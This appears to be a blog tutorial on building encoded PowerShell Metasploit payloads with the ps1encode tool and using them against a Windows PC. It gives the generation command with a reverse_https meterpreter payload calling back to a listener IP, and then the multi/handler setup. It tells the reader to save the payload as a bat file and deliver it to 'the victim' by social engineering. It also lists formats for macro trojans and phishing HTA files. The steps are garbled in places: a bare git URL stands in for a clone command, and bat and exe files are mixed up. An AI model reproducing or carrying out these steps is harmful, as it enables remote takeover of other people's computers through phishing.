Exploit Remote Windows PC using ps1encodeTool

Use to generate and encode a powershell based metasploit payloads.

 Available output types:

  • raw (encoded payload only – no powershell run options)
  • cmd (for use with bat files)
  • vba (for use with macro trojan docs)
  • vbs (for use with vbs scripts)
  • war (tomcat)
  • exe (executable) requires MinGW – i586-mingw32msvc-gcc [apt-get install mingw32]
  • java (for use with malicious java applets)
  • js (javascript)
  • php (for use with php pages)
  • hta (HTML applications)
  • cfm (for use with Adobe ColdFusion)
  • aspx (for use with Microsoft ASP.NET)
  • lnk (windows shortcut – requires a website to stage the payload)

Open your kali Linux terminal and type the following command

https://github.com/CroweCybersecurity/ps1encode.git

./ps1encode.rb  -I 192.168.0.140 –p 4567 –a windows/meterpreter/reverse_https –t cmd

raw =>  base64 powershell code only without the run options
cmd =>  default payload – use with bat files or for an easy copy + paste + shell job
vba => for use with Microsoft Office products for macro trojans
war => for use with Apache Tomcat
exe => executable that will call out powershell and inject code into it. Requires MinGW to compile
java => for use with java applet attacks (details on this and the setup instructions later)
php =>  for use with PHP sites – an alternative to using web shells
hta => HTML Applications –  good alternative to executables in phishing campaigns
cfm => for use with Adobe ColdFusion. Similar to PHP, this is an alternative to using a web shell

Copy the highlighted text shown in below window and save in bat format and send it to the victim

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.0.140

exploit

Now send your batch files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

Leave a Reply

Your email address will not be published. Required fields are marked *